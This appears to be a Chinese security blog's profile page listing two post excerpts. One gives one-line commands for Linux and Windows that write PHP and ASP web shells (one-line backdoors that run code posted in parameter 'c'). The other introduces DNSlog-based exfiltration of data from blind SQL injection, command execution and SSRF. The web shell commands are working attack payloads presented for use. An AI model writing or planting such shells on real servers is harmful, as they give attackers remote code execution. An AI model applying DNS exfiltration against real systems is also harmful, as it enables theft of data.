- 博客(2)
- 资源 (2)
- 收藏
- 关注
原创 CMD写一句话木马
linux: echo -e "<?@include(\$_POST["c"]);?>" > webshell.cc.php 会再同目录下生成webshell.cc.php一句话 密码:c win: echo ^<%eval request("c")%^> >>webshell.cc.asp 会再同目录下生成webshell.cc.asp一句话 密码:c ...
2020-12-22 08:39:13
2982
1
原创 DNSlog注入浅谈
文章目录前言一、前提条件二、利用步骤1.注册一个域名2.数据库配置3.实际操作总结 前言 DNSlog在Web漏洞利用简单理解就是在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过这种方式把想获得的数据外带出来。 这里使用的DNS的原因是:DNS在解析的时候会留下日志,咱们这个就是读取多级域名的解析日志,来获取信息 简单来说就是把信息放在高级域名中,传递到自己这,然后读取日志,获取信息。 一、前提条件 1、SQL盲注、无回显的命令执行、无回显的SSRF ; 2、只能用.
2020-12-13 15:55:51
830
2020.12可用hackbar
2020-12-13
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人